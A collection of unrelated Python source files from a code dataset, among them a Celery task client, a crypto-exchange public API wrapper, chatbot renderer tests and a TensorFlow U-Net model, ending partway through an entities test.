REQUIRED_FUNCTIONS = set([
'get_X',
'get_y',
'fake_X',
'fake_y',
'get_predictions',
'save_predictions',
])
class Opener(abc.ABC):
"""Dataset opener abstract base class.
To define a new opener script, subclass this class and implement the
following abstract methods:
- #Opener.get_X()
- #Opener.get_y()
- #Opener.fake_X()
- #Opener.fake_y()
- #Opener.get_predictions()
- #Opener.save_predictions()
# Example
```python
import os
import pandas as pd
import string
import numpy as np
import substratools as tools
class DummyOpener(tools.Opener):
def get_X(self, folders):
return [
pd.read_csv(os.path.join(folder, 'train.csv'))
for folder in folders
]
def get_y(self, folders):
return [
pd.read_csv(os.path.join(folder, 'y.csv'))
for folder in folders
]
def fake_X(self):
return [] # compute random fake data
def fake_y(self):
return [] # compute random fake data
def save_predictions(self, y_pred, path):
with open(path, 'w') as fp:
y_pred.to_csv(fp, index=False)
def get_predictions(self, path):
return pd.read_csv(path)
```
"""
@abc.abstractmethod
def get_X(self, folders):
"""Load feature data from data sample folders.
# Arguments
folders: list of folders. Each folder represents a data sample.
# Returns
data: data object.
"""
raise NotImplementedError
@abc.abstractmethod
def get_y(self, folders):
"""Load labels from data sample folders.
# Arguments
folders: list of folders. Each folder represents a data sample.
# Returns
data: data labels object.
"""
raise NotImplementedError
@abc.abstractmethod
def fake_X(self):
"""Generate a fake matrix of features for offline testing.
# Returns
data: data labels object.
"""
raise NotImplementedError
@abc.abstractmethod
def fake_y(self):
"""Generate a fake target variable vector for offline testing.
# Returns
data: data labels object.
"""
raise NotImplementedError
@abc.abstractmethod
def get_predictions(self, path):
"""Read file and return predictions vector.
# Arguments
path: string file path.
# Returns
predictions: predictions vector.
"""
raise NotImplementedError
@abc.abstractmethod
def save_predictions(self, y_pred, path):
"""Write predictions vector to file.
# Arguments
y_pred: predictions vector.
path: string file path.
"""
raise NotImplementedError
class OpenerWrapper(object):
"""Internal wrapper to call opener interface."""
def __init__(self, interface, workspace=None):
assert isinstance(interface, Opener) or \
isinstance(interface, types.ModuleType)
self._workspace = workspace or Workspace()
self._interface = interface
@property
def data_folder_paths(self):
rootpath = self._workspace.input_data_folder_path
folders = [os.path.join(rootpath, subfolder_name)
for subfolder_name in os.listdir(rootpath)
if os.path.isdir(os.path.join(rootpath, subfolder_name))]
return folders
def get_X(self, fake_data=False):
if fake_data:
logger.info("loading X from fake data")
return self._interface.fake_X()
else:
logger.info("loading X from '{}'".format(self.data_folder_paths))
return self._interface.get_X(self.data_folder_paths)
def get_y(self, fake_data=False):
if fake_data:
logger.info("loading y from fake data")
return self._interface.fake_y()
else:
logger.info("loading y from '{}'".format(self.data_folder_paths))
return self._interface.get_y(self.data_folder_paths)
def get_predictions(self):
path = self._workspace.input_predictions_path
logger.info("loading predictions from '{}'".format(path))
return self._interface.get_predictions(path)
def save_predictions(self, y_pred):
path = self._workspace.output_predictions_path
logger.info("saving predictions to '{}'".format(path))
return self._interface.save_predictions(y_pred, path)
def load_from_module(path=None, workspace=None):
"""Load opener interface from path or from python environment.
Opener can be defined as an Opener subclass or directly has a module.
Return an OpenerWrapper instance.
"""
interface = utils.load_interface_from_module(
'opener',
interface_class=Opener,
interface_signature=REQUIRED_FUNCTIONS,
path=path,
)
return OpenerWrapper(interface, workspace=workspace)
| StarcoderdataPython |
6651784 | """
This module defines client service methods for celery result (for client
processing)
"""
from celery.result import ResultBase, AsyncResult
from conf.appconfig import TASK_SETTINGS
from deployer import util
from deployer.tasks.exceptions import TaskExecutionException
class TaskClient:
def __init__(self, celery_app):
self.celery_app = celery_app
def find_error_task(self, task, wait=False, raise_error=False,
timeout=TASK_SETTINGS['DEFAULT_GET_TIMEOUT']):
if not task or not isinstance(task, ResultBase):
return
if isinstance(task, AsyncResult):
if not task.ready() and wait:
task.get(propagate=raise_error, timeout=timeout)
if task.failed():
return task
elif task.status in ['PENDING'] and task.parent:
while task.parent:
if task.parent.failed():
return task.parent
else:
task = task.parent
else:
return self.find_error_task(task.result)
else:
return
def ready(self, id, wait=False, raise_error=False,
timeout=TASK_SETTINGS['DEFAULT_GET_TIMEOUT']):
@util.timeout(seconds=timeout)
@util.retry(10, delay=5, backoff=1, except_on=(IOError,))
def get_result():
status = 'READY'
output = self.celery_app.AsyncResult(id)
error_task = self.find_error_task(output, raise_error=False,
wait=wait, timeout=timeout)
if error_task:
output, status = \
error_task.result, error_task.status
if not isinstance(output, (TaskExecutionException,)):
output = TaskExecutionException(output,
error_task.traceback)
if raise_error:
raise output
else:
while isinstance(output, AsyncResult) and status == 'READY':
if wait:
output.get(timeout=timeout, propagate=raise_error)
if output.ready():
output = output.result
else:
status = 'PENDING'
output = None
if output:
try:
output = output.to_dict()
except AttributeError:
if not isinstance(output, dict) \
and not isinstance(output, list):
output = str(output)
return {
'status': status,
'output': output
}
return get_result()
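# Usage sketch (added; `app` and `task_id` are assumed to come from the deployer's Celery
# setup and are not defined in this module):
#   client = TaskClient(app)
#   client.ready(task_id, wait=True, raise_error=False)
# returns {'status': 'READY', 'output': ...} once the whole chain has finished,
# {'status': 'PENDING', 'output': None} while an intermediate result is still running,
# or the failed task's state with a serialized TaskExecutionException as the output.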
| StarcoderdataPython |
1750768 | # Generated by Django 4.0 on 2022-01-25 21:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0006_ticketimage_external_url_alter_warehousereply_files'),
]
operations = [
migrations.RemoveField(
model_name='warehousereply',
name='files',
),
migrations.AlterField(
model_name='ticketimage',
name='ticket',
field=models.ManyToManyField(to='main.Tickets'),
),
migrations.CreateModel(
name='ReplyImage',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('file', models.FileField(blank=True, max_length=255, upload_to='replyfiles/%Y/%m/%d')),
('reply', models.ManyToManyField(to='main.WarehouseReply')),
],
),
]
| StarcoderdataPython |
6460734 | # SPDX-License-Identifier: ISC
# Copyright (c) 2013 <NAME> <<EMAIL>>
import unittest
class TestFilterRegistry(unittest.TestCase):
def test_all_filters_exist(self):
from afew import FilterRegistry
self.assertTrue(hasattr(FilterRegistry.all_filters, 'get'))
def test_entry_point_registration(self):
from afew import FilterRegistry
class FakeRegistry:
name = 'test'
def load(self):
return 'class'
registry = FilterRegistry.FilterRegistry([FakeRegistry()])
self.assertEqual('class', registry['test'])
def test_add_FilterRegistry(self):
from afew import FilterRegistry
try:
FilterRegistry.all_filters['test'] = 'class'
self.assertEqual('class', FilterRegistry.all_filters['test'])
finally:
del FilterRegistry.all_filters['test']
| StarcoderdataPython |
1602337 | from __future__ import print_function
import pendulum
import requests
import furl
from .constant import BASE_API_URL
class Public:
def __init__(self, url=None):
self.url = url if url is not None else BASE_API_URL
def ping(self):
""" See https://apidocs.stex.com/#/Public/get_public_ping """
return self.send_request(self.url + '/public/ping')
def currencies(self):
""" See https://apidocs.stex.com/#/Public/get_public_currencies """
return self.send_request(self.url + '/public/currencies')
def currencies_by_id(self, currency_id):
""" See https://apidocs.stex.com/#/Public/get_public_currencies__currencyId_ """
return self.send_request(self.url + '/public/currencies/' + str(currency_id))
def markets(self):
""" See https://apidocs.stex.com/#/Public/get_public_markets """
return self.send_request(self.url + '/public/markets')
def pairs_groups(self):
""" See https://apidocs.stex.com/#/Public/get_public_pairs_groups """
return self.send_request(self.url + '/public/pairs-groups')
def currency_pairs_list(self, code=None):
""" See https://apidocs.stex.com/#/Public/get_public_currency_pairs_list__code_ """
if code is None:
code = 'ALL'
return self.send_request(self.url + '/public/currency_pairs/list/' + code)
def pairs_groups_by_id(self, currency_pair_group_id):
""" See https://apidocs.stex.com/#/Public/get_public_currency_pairs_group__currencyPairGroupId_ """
return self.send_request(self.url + '/public/currency_pairs/group/' + str(currency_pair_group_id))
def currency_pairs_by_id(self, currency_pair_id):
""" See https://apidocs.stex.com/#/Public/get_public_currency_pairs__currencyPairId_ """
return self.send_request(self.url + '/public/currency_pairs/' + str(currency_pair_id))
def ticker(self):
""" See https://apidocs.stex.com/#/Public/get_public_ticker """
return self.send_request(self.url + '/public/ticker')
def ticker_by_currency_pair_id(self, currency_pair_id):
""" See https://apidocs.stex.com/#/Public/get_public_ticker__currencyPairId_ """
return self.send_request(self.url + '/public/ticker/' + str(currency_pair_id))
def trades_by_currency_pair_id(self, currency_pair_id, params=None):
""" See https://apidocs.stex.com/#/Public/get_public_trades__currencyPairId_ """
if params is None:
params = {}
f = furl.furl(self.url + '/public/trades/' + str(currency_pair_id)).add(params)
return self.send_request(f.url)
def orderbook_by_currency_pair_id(self, currency_pair_id, params=None):
""" See https://apidocs.stex.com/#/Public/get_public_orderbook__currencyPairId_"""
if params is None:
params = {}
f = furl.furl(self.url + '/public/orderbook/' + str(currency_pair_id)).add(params)
return self.send_request(f.url)
def chart(self, currency_pair_id, candles_type='1D', time_start=None, time_end=None, params=None):
""" See https://apidocs.stex.com/#/Public/get_public_chart__currencyPairId___candlesType_ """
now = pendulum.now('UTC')
if params is None:
params = {}
if time_start is None:
params['timeStart'] = now.subtract(weeks=1).int_timestamp
if time_end is None:
params['timeEnd'] = now.int_timestamp
f = furl.furl(self.url + '/public/chart/' + str(currency_pair_id) + '/' + candles_type).add(params)
return self.send_request(f.url)
@staticmethod
def send_request(url):
try:
r = requests.get(url)
return r.json()
except Exception as e:
return e
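# Usage sketch (added): the methods above are thin wrappers around unauthenticated GET
# requests, so no credentials are needed for the public API. BASE_API_URL comes from the
# sibling constant module; the currency pair id below is only an illustrative assumption.
if __name__ == '__main__':
    api = Public()
    print(api.ping())                          # GET /public/ping
    print(api.ticker_by_currency_pair_id(1))   # GET /public/ticker/1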
| StarcoderdataPython |
3384325 | <reponame>cotobadesign/cotoba-agent-oss
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import unittest.mock
from programy.clients.render.html import HtmlRenderer
class MockHtmlBotClient(object):
def __init__(self):
self._response = None
self.configuration = unittest.mock.Mock()
self.configuration.host = "127.0.0.1"
self.configuration.port = "6666"
self.configuration.api = "/api/web/v1.0/ask"
def process_response(self, client_context, response):
self._response = response
class HtmlRendererTests(unittest.TestCase):
def test_create_postback_url(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
postback = renderer.create_postback_url()
self.assertIsNotNone(postback)
self.assertEqual(postback, "#")
def test_text_only(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "Hello world")
self.assertEqual(mock_console._response, "Hello world")
def test_url_button(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<button><text>Hello</text><url>http://click.me</url></button>")
self.assertEqual(mock_console._response, '<a href="http://click.me">Hello</a>')
def test_postback_button(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<button><text>Hello</text><postback>HELLO</postback></button>")
self.assertEqual(mock_console._response, '<a class="postback" postback="HELLO" href="#">Hello</a>')
def test_link(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<link><text>Hello</text><url>http://click.me</url></link>")
self.assertEqual(mock_console._response, '<a href="http://click.me">Hello</a>')
def test_image(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<image>http://servusai.com/aiml.png</image>")
self.assertEqual(mock_console._response, '<img src="http://servusai.com/aiml.png" />')
def test_video(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<video>http://servusai.com/aiml.mov</video>")
texts = '<video src="http://servusai.com/aiml.mov">\n' + \
"Sorry, your browser doesn't support embedded videos, \n" + \
"but don't worry, you can " + '<a href="http://servusai.com/aiml.mov">download it</a>\n' + \
'and watch it with your favorite video player!\n' + \
'</video>'
self.assertEqual(mock_console._response, texts)
def test_card(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
texts1 = '<card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle>' + \
'<button><text>Hello</text><url>http://click.me</url></button></card>'
renderer.render("testuser", texts1)
texts2 = '<div class="card" ><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1>' + \
'<h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>'
self.assertEqual(mock_console._response, texts2)
def test_carousel(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
texts1 = '<carousel><card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle>' + \
'<button><text>Hello</text><url>http://click.me</url></button></card></carousel>'
renderer.render("testuser", texts1)
texts2 = '<div class="carousel"><div class="card" ><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1>' + \
'<h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div></div>'
self.assertEqual(mock_console._response, texts2)
def test_reply_with_postback(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<reply><text>Hello</text><postback>HELLO</postback></reply>")
self.assertEqual(mock_console._response, '<a class="postback" postback="HELLO" href="#">Hello</a>')
def test_reply_without_postback(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<reply><text>Hello</text></reply>")
self.assertEqual(mock_console._response, '<a class="postback" postback="Hello" href="#">Hello</a>')
def test_delay(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<delay><seconds>0</seconds></delay>")
self.assertEqual(mock_console._response, '<div class="delay">...</div>')
def test_split(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<split />")
self.assertEqual(mock_console._response, "<br />")
def test_list(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<list><item>Item1</item><item>Item2</item></list>")
self.assertEqual(mock_console._response, "<ul><li>Item1</li><li>Item2</li></ul>")
def test_olist(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<olist><item>Item1</item><item>Item2</item></olist>")
self.assertEqual(mock_console._response, "<ol><li>Item1</li><li>Item2</li></ol>")
def test_location(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<location />")
self.assertEqual(mock_console._response, "")
| StarcoderdataPython |
78105 | <reponame>SidneyAn/nfv
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common.event_log.objects.v1._event_log_data import EventLogData # noqa: F401
from nfv_common.event_log.objects.v1._event_log_data import EventLogStateData # noqa: F401
from nfv_common.event_log.objects.v1._event_log_data import EventLogThresholdData # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_CONTEXT # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_ID # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_IMPORTANCE # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_INITIATED_BY # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_TYPE # noqa: F401
| StarcoderdataPython |
3483737 | import re
number_of_strings = int(input())
pattern = r"\!(?P<command>[A-Z][a-z]{2,})\!:\[(?P<text>[A-Za-z]{8,})\]"
for i in range(number_of_strings):
message = input()
matches = re.match(pattern, message)
if not matches:
print("The message is invalid")
else:
mach_command = matches.group('command')
for chr in matches.group('text'):
char_ascii_num_list.append(str(ord(chr)))
print(f"{mach_command}: {' '.join(char_ascii_num_list)}")
| StarcoderdataPython |
3415328 | from typing import Union
from fspider.downloadermiddlewares import DownloaderMiddleware
from fspider.http.request import Request
from fspider.http.response import Response
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh-HK;q=0.9,zh;q=0.8,en;q=0.7,la;q=0.6,ja;q=0.5',
'accept-encoding': 'gzip, deflate, br',
}
class DefaultHeadersMiddleware(DownloaderMiddleware):
def __init__(self):
super(DefaultHeadersMiddleware, self).__init__()
self._headers = self.settings.get('DEFAULT_REQUEST_HEADERS', DEFAULT_REQUEST_HEADERS)
async def process_request(self, request: Request) -> Union[Request, Response, None]:
for k, v in self._headers.items():
request.headers.setdefault(k, v)
| StarcoderdataPython |
1803127 | <filename>src/tenyksscripts/scripts/portlandtime.py
from datetime import datetime
from dateutil.tz import tzlocal
import pytz
import random
def run(data, settings):
if data['payload'] == 'portland time':
if random.random() > 0.3:
tz = pytz.timezone('America/Los_Angeles')
now = datetime.now(tzlocal())
now.replace(tzinfo=tz)
return now.astimezone(tz).strftime('%X')
else:
return "Don't you know?"
| StarcoderdataPython |
3426412 | from django.conf import settings
from storages.backends.s3boto3 import S3Boto3Storage
class StaticStorage(S3Boto3Storage):
location = settings.AWS_STATIC_LOCATION
class MediaStorage(S3Boto3Storage):
location = 'media'
file_overwrite = False
default_acl = 'public-read'
| StarcoderdataPython |
5020084 | """
Test that an alias can reference other aliases without crashing.
"""
from __future__ import print_function
import os
import time
import re
import lldb
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class NestedAliasTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.line = line_number('main.cpp', '// break here')
def test_nested_alias(self):
"""Test that an alias can reference other aliases without crashing."""
self.build()
exe = os.path.join(os.getcwd(), "a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Break in main() after the variables are assigned values.
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped', 'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# This is the function to remove the custom aliases in order to have a
# clean slate for the next test case.
def cleanup():
self.runCmd('command unalias read', check=False)
self.runCmd('command unalias rd', check=False)
self.runCmd('command unalias fo', check=False)
self.runCmd('command unalias foself', check=False)
# Execute the cleanup function during test case tear down.
self.addTearDownHook(cleanup)
self.runCmd('command alias read memory read -f A')
self.runCmd('command alias rd read -c 3')
self.expect(
'memory read -f A -c 3 `&my_ptr[0]`',
substrs=[
'deadbeef',
'main.cpp:',
'feedbeef'])
self.expect(
'rd `&my_ptr[0]`',
substrs=[
'deadbeef',
'main.cpp:',
'feedbeef'])
self.expect(
'memory read -f A -c 3 `&my_ptr[0]`',
substrs=['deadfeed'],
matching=False)
self.expect('rd `&my_ptr[0]`', substrs=['deadfeed'], matching=False)
self.runCmd('command alias fo frame variable -O --')
self.runCmd('command alias foself fo self')
self.expect(
'help foself',
substrs=[
'--show-all-children',
'--raw-output'],
matching=False)
self.expect(
'help foself',
substrs=[
'Show variables for the current',
'stack frame.'],
matching=True)
| StarcoderdataPython |
5176533 | """
"Macro-profiling" section example of invoking cProfile
Python profiles from Python script
"""
import time
import cProfile
def medium():
time.sleep(0.01)
def light():
time.sleep(0.001)
def heavy():
for i in range(100):
light()
medium()
medium()
time.sleep(2)
def main():
for i in range(2):
heavy()
if __name__ == '__main__':
profiler = cProfile.Profile()
profiler.runcall(main)
profiler.print_stats()
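# Equivalent invocation (added): the same statistics can be gathered without editing the
# script by running it under the profiler from the command line, e.g.
#   python -m cProfile -s cumulative this_script.py
# The runcall() form above is simply the in-process way to restrict profiling to main().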
| StarcoderdataPython |
1629511 | import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import layers
import numpy as np
import csv
import sys
import os
# Import utility functions from 'utils.py' file
from utils import checkFolders, show_variables, add_suffix, backup_configs
# Import convolution layer definitions from 'convolution layers.py' file
from convolution_layers import conv2d_layer, inception_v3, transpose_conv2d_layer, transpose_inception_v3, dense_layer, factored_conv2d, upsample
"""
U-Net model with optional KL-divergence (post-activation),
decoder-only batch-normalization, optional upsampling,
and probabilistic loss according to MVN prediction.
"""
# Encoder component of VAE model
def encoder(self, x, training=True, reuse=None, name=None):
# Unpack data
data, mesh, __ = x
if self.use_noise_injection:
interior_indices = tf.greater(mesh, 0)
zero_tensor = tf.zeros_like(data)
noisy_data = tf.distributions.Normal(loc=data, scale=self.noise_level*tf.ones_like(data), name='noisy_data').sample()
data = tf.cond(training, lambda: noisy_data, lambda: data)
data = tf.where(interior_indices, data, zero_tensor)
if not (self.alt_res == 128):
data = tf.image.resize_images(data, [self.alt_res, self.alt_res])
# [None, 64, 64, 1] --> [None, 32, 32, 16]
h1 = conv2d_layer(data, 48, kernel_size=5, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_1')#, coordconv=self.coordconv)
h1 = layers.max_pooling2d(h1, 2, 2, padding='same', data_format='channels_last', name='e_pool_1')
# [None, 32, 32, 16] --> [None, 16, 16, 32]
if self.factor:
h2 = factored_conv2d(h1, 48, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_2')
h2 = layers.max_pooling2d(h2, 2, 2, padding='same', data_format='channels_last', name='e_pool_2')
else:
h2 = conv2d_layer(h1, 48, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_2')#, coordconv=self.coordconv)
h2 = layers.max_pooling2d(h2, 2, 2, padding='same', data_format='channels_last', name='e_pool_2')
h3 = inception_v3(h2, 80, stride=1, batch_norm=False, training=training, reuse=reuse, name='e_incept_1')
# [None, 16, 16, 64] --> [None, 8, 8, 64]
h4 = conv2d_layer(h3, 80, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_3')#, coordconv=self.coordconv)
h4 = layers.max_pooling2d(h4, 2, 2, padding='same', data_format='channels_last', name='e_pool_3')
if self.use_inception:
h5 = inception_v3(h4,150, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_incept_4')
h5 = layers.max_pooling2d(h5, 2, 2, padding='same', data_format='channels_last', name='e_pool_4')
else:
h5 = conv2d_layer(h4, 150, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_4')#, coordconv=self.coordconv)#, activation=None)
h5 = layers.max_pooling2d(h5, 2, 2, padding='same', data_format='channels_last', name='e_pool_4')
chans = 512 if self.use_kl else 256
omit = True if self.use_kl else False
h6 = inception_v3(h5, chans, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='e_incept_5',
omit_activation=omit)
h6 = layers.max_pooling2d(h6, 2, 2, padding='same', data_format='channels_last', name='e_pool_5')
if self.coordconv:
h6 = conv2d_layer(h6, chans, kernel_size=2, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_6', coordconv=self.coordconv)
if not self.use_kl:
h6 = tf.layers.dropout(h6, rate=self.dropout_rate, training=training)
elif self.use_extra_dropout:
h6 = tf.layers.dropout(h6, rate=self.dropout_rate, training=training)
return h1, h2, h3, h4, h5, h6
# Decoder component of VAE model
def decoder(self, z, training=True, reuse=None, name=None):
# Note: h2 and h3 have same resolution
h1, h2, h3, h4, h5, h6 = z
# h6 ~ [None, 4, 4, 256]
h = h6
h = inception_v3(h, 256, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='d_incept_0')
h = tf.layers.dropout(h, rate=self.dropout_rate, training=training)
if self.coordconv:
h = conv2d_layer(h, 256, kernel_size=2, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='d_conv_0', coordconv=self.coordconv)
# [None, 4, 4, 256] --> [None, 8, 8, 128]
stride = 1 if self.interpolate else 2
h = transpose_conv2d_layer(h, 150, kernel_size=2, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_0')#, coordconv=self.coordconv)
if self.interpolate:
h = upsample(h, 4*2)
h = tf.concat([h, h5],3)
# [None, 8, 8, 64] --> [None, 16, 16, 64]
h = transpose_conv2d_layer(h, 80, kernel_size=2, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_1')#, coordconv=self.coordconv)
if self.interpolate:
h = upsample(h, 4*2*2)
h = tf.concat([h, h4],3)
# [None, 16, 16, 64] --> [None, 32, 32, 32]
if self.symmetric:
h = transpose_inception_v3(h, 80, stride=stride, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='d_tincept_2')
else:
h = transpose_inception_v3(h, 80, stride=stride, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='d_tincept_2')
if self.interpolate:
h = upsample(h, 4*2*2*2)
h = tf.concat([h, h3],3)
# [None, 32, 32, 32] --> [None, 64, 64, 16]
h_m = transpose_conv2d_layer(h, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=1, training=training, reuse=reuse, name='d_tconv_2_1')#, coordconv=self.coordconv)
h_m = transpose_conv2d_layer(h_m, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_2_2')
h_s = transpose_conv2d_layer(h, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=1, training=training, reuse=reuse, name='d_tconv_2_1_s')#, coordconv=self.coordconv)
h_s = transpose_conv2d_layer(h_s, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_2_2_s')
if self.interpolate:
h_m = upsample(h_m, 4*2*2*2*2)
h_s = upsample(h_s, 4*2*2*2*2)
#h = tf.concat([h, h1],3)
# [None, 64, 64, 16] --> [None, 128, 128, 1]
s = transpose_conv2d_layer(h_s, 1, kernel_size=6, batch_norm=False, stride=2, activation=None,
add_bias=False, training=training, reuse=reuse, name='d_tconv_3_s')
h = transpose_conv2d_layer(h_m, 1, kernel_size=6, batch_norm=False, stride=2, activation=None,
add_bias=False, training=training, reuse=reuse, name='d_tconv_3_m')
# Assign name to final output
return tf.identity(h, name=name), s
# Evaluate model on specified batch of data
def evaluate_model(self, data, reuse=None, training=True, suffix=None):
# Encode input images
z = self.encoder(self, data, training=training, reuse=reuse, name=add_suffix("encoder", suffix))
# Sample in latent spaces
if self.use_kl:
h1, h2, h3, h4, h5, h6 = z
m, log_s = tf.split(h6, num_or_size_splits=2, axis=3)
h6 = self.sampleGaussian(m, log_s, name='latent_sample')
h6 = tf.layers.dropout(h6, rate=self.dropout_rate, training=training)
z = [h1, h2, h3, h4, h5, h6]
#if self.reduce_noise:
# # Use KL divergence w.r.t. N(0, 0.1*I)
# # by comparing with 10*sigma ~ log(10*sigma) ~ log(10) + log(sigma)
# kl_loss = self.kl_wt*tf.reduce_sum([self.compute_kl_loss(m,tf.add(10.0*tf.ones_like(log_s),log_s))])
#else:
# kl_loss = self.kl_wt*tf.reduce_sum([self.compute_kl_loss(m,log_s)])
kl_loss = self.kl_wt*tf.reduce_sum([self.compute_kl_loss(m,log_s)])
else:
h1, h2, h3, h4, h5, h6 = z
h6 = tf.nn.leaky_relu(h6)
z = [h1, h2, h3, h4, h5, h6]
# Compute Kullback–Leibler (KL) divergence
kl_loss = self.kl_wt
# Decode latent vector back to original image
pred = self.decoder(self, z, training=training, reuse=reuse, name=add_suffix("pred", suffix))
# Compute marginal likelihood loss
masked_soln, masked_pred, masked_scale, interior_loss, boundary_loss, prob_loss = self.compute_ms_loss(data, pred, name=add_suffix("ms_loss", suffix))
# Assign names to outputs
masked_soln = tf.identity(masked_soln, name=add_suffix('masked_soln', suffix))
masked_pred = tf.identity(masked_pred, name=add_suffix('masked_pred', suffix))
masked_scale = tf.identity(masked_scale, name=add_suffix('masked_scale', suffix))
return masked_soln, masked_pred, masked_scale, interior_loss, boundary_loss, kl_loss, prob_loss
| StarcoderdataPython |
1706798 | <filename>tests/test_entities.py
"""Tests entities."""
import unittest
from monitor.entities import IssueMeta, IssueCommentMeta, GitHubAuthorAssociations
class TestEntities(unittest.TestCase):
"""Tests entities."""
def test_issue(self):
"""Tests meta issue class."""
issue = IssueMeta(title="Awesome issue",
number=42,
state="open",
assignee="AwesomePerson",
